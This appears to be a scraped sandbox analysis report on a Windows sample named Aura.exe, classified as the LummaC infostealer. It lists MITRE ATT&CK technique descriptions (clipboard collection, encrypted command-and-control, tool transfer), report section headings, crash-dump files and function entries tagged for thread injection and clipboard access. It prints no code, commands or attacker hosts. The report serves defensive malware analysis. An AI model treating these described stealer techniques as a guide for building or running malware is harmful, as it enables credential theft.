Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Aura.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Aura.exe_919c911714a3911bab40457a30dfd2c781d27e2_27bdd1c1_3ed4ccae-f4d4-4177-b00b-f340d8e200ee\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E99.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F65.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FF3.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Windows Analysis Report
Aura.exe

Function 02EF8611 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 02EF878E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 01492C3A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219
memoryCOMMON

Function 014906E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
memoryCOMMON

Function 0043E540 Relevance: 32.2, APIs: 11, Strings: 7, Instructions: 718
memorycomCOMMON

Function 03981000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Function 004269A0 Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 541
COMMON

Function 0040E5BF Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 319
COMMON

Function 00408890 Relevance: 7.8, APIs: 5, Instructions: 297
threadCOMMON

Function 00431430 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 398
COMMON

Function 004311FA Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 353
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre